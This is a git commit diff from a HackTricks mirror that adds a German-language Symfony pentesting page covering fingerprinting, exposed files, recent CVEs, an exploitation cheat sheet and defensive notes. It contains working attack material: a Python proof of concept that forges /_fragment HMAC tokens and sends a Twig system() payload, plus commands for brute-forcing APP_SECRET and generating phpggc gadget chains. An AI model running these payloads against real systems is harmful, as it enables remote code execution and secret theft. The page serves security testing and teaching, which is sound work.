maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/symphony.md'

Browse Source
This commit is contained in:
Translator 2025-07-23 10:25:45 +00:00
parent 442c36ddd5
commit 7a3182e520
1 changed files with 117 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

121
src/network-services-pentesting/pentesting-web/symphony.md
View File

@ -2,10 +2,123 @@
{{#include ../../banners/hacktricks-training.md}}
Werfen Sie einen Blick auf die folgenden Beiträge:
Symfony ist eines der am häufigsten verwendeten PHP-Frameworks und erscheint regelmäßig in Bewertungen von Unternehmens-, E-Commerce- und CMS-Zielen (Drupal, Shopware, Ibexa, OroCRM … alle integrieren Symfony-Komponenten). Diese Seite sammelt offensive Tipps, häufige Fehlkonfigurationen und aktuelle Schwachstellen, die Sie auf Ihrer Checkliste haben sollten, wenn Sie eine Symfony-Anwendung entdecken.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
> Historische Anmerkung: Ein großer Teil des Ökosystems läuft immer noch auf dem **5.4 LTS**-Zweig (EOL **November 2025**). Überprüfen Sie immer die genaue Minor-Version, da viele Sicherheitswarnungen von 2023-2025 nur in Patch-Versionen behoben wurden (z. B. 5.4.46 → 5.4.50).
---
## Recon & Enumeration
### Fingerprinting
* HTTP-Antwortheader: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` oder Cookies, die mit `sf_redirect`, `sf_session`, `MOCKSESSID` beginnen.
* Quellcode-Leaks (`composer.json`, `composer.lock`, `/vendor/…`) offenbaren oft die genaue Version:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Öffentliche Routen, die nur auf Symfony existieren:
* `/_profiler` (Symfony **Profiler** & Debug-Toolbar)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (schöne Fehlerseiten)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 Dev-Front-Controller)
* Wappalyzer, BuiltWith oder ffuf/feroxbuster-Wortlisten: `symfony.txt` → suchen Sie nach `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Interessante Dateien & Endpunkte
| Pfad | Warum es wichtig ist |
|------|---------------------|
| `/.env`, `/.env.local`, `/.env.prod` | Häufig falsch bereitgestellt → leakt `APP_SECRET`, DB-Credentials, SMTP, AWS-Keys |
| `/.git`, `.svn`, `.hg` | Quelloffenlegung → Credentials + Geschäftslogik |
| `/var/log/*.log`, `/log/dev.log` | Fehlkonfiguration des Web-Roots exponiert Stack-Traces |
| `/_profiler` | Vollständige Anfragehistorie, Konfiguration, Dienstcontainer, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Einstiegspunkt, der von ESI/HInclude verwendet wird. Missbrauch möglich, sobald Sie `APP_SECRET` kennen |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE, wenn zugänglich (CVE-2017-9841) |
| `/index.php/_error/{code}` | Fingerprinting & manchmal Leck von Ausnahme-Trace |
---
## Hochrisiko-Schwachstellen (2023-2025)
### 1. APP_SECRET Offenlegung ➜ RCE über `/_fragment` (auch bekannt als “secret-fragment”)
* **CVE-2019-18889** ursprünglich, aber *erscheint immer noch* auf modernen Zielen, wenn Debug aktiviert bleibt oder `.env` exponiert ist.
* Sobald Sie das 32-Zeichen `APP_SECRET` kennen, erstellen Sie ein HMAC-Token und missbrauchen Sie den internen `render()`-Controller, um beliebiges Twig auszuführen:
```python
# PoC erfordert das Secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Ausgezeichnete Beschreibung & Ausbeutungsskript: Ambionics-Blog (verlinkt in den Referenzen).
### 2. Windows Process Hijack CVE-2024-51736
* Die `Process`-Komponente suchte das aktuelle Arbeitsverzeichnis **vor** `PATH` unter Windows. Ein Angreifer, der `tar.exe`, `cmd.exe` usw. in einem beschreibbaren Web-Root hochladen und `Process` auslösen kann (z. B. Dateiextraktion, PDF-Generierung), erhält die Möglichkeit zur Befehlsausführung.
* In 5.4.50, 6.4.14, 7.1.7 gepatcht.
### 3. Session-Fixation CVE-2023-46733
* Der Authentifizierungswächter verwendete eine vorhandene Sitzungs-ID nach dem Login. Wenn ein Angreifer das Cookie **vor** der Authentifizierung des Opfers setzt, übernimmt er das Konto nach dem Login.
### 4. Twig-Sandbox XSS CVE-2023-46734
* In Anwendungen, die benutzerkontrollierte Vorlagen (Admin-CMS, E-Mail-Builder) exponieren, könnte der `nl2br`-Filter missbraucht werden, um die Sandbox zu umgehen und JS einzufügen.
### 5. Symfony 1 Gadget-Ketten (immer noch in Legacy-Apps gefunden)
* `phpggc symfony/1 system id` erzeugt eine Phar-Nutzlast, die RCE auslöst, wenn eine unserialize() auf Klassen wie `sfNamespacedParameterHolder` erfolgt. Überprüfen Sie Datei-Upload-Endpunkte und `phar://`-Wrapper.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Exploitation Cheat-Sheet
### HMAC-Token für `/_fragment` berechnen
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce schwaches `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE über exponierte Symfony Console
Wenn `bin/console` über `php-fpm` oder direkten CLI-Upload erreichbar ist:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Verwenden Sie Deserialisierungs-Gadgets im Cache-Verzeichnis oder schreiben Sie eine bösartige Twig-Vorlage, die bei der nächsten Anfrage ausgeführt wird.
---
## Defensive Hinweise
1. **Setzen Sie niemals Debug ein** (`APP_ENV=dev`, `APP_DEBUG=1`) in der Produktion; blockieren Sie `/app_dev.php`, `/_profiler`, `/_wdt` in der Webserver-Konfiguration.
2. Speichern Sie Geheimnisse in Umgebungsvariablen oder `vault/secrets.local.php`, *niemals* in Dateien, die über das Document-Root zugänglich sind.
3. Erzwingen Sie das Patch-Management abonnieren Sie die Symfony-Sicherheitswarnungen und halten Sie mindestens das LTS-Patch-Level.
4. Wenn Sie unter Windows arbeiten, aktualisieren Sie sofort, um CVE-2024-51736 zu mindern, oder fügen Sie eine `open_basedir`/`disable_functions` Verteidigung in der Tiefe hinzu.
---
### Nützliche offensive Werkzeuge
* **ambionics/symfony-exploits** secret-fragment RCE, Entdeckung von Debugger-Routen.
* **phpggc** Fertige Gadget-Ketten für Symfony 1 & 2.
* **sf-encoder** kleiner Helfer zur Berechnung des `_fragment` HMAC (Go-Implementierung).
## Referenzen
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}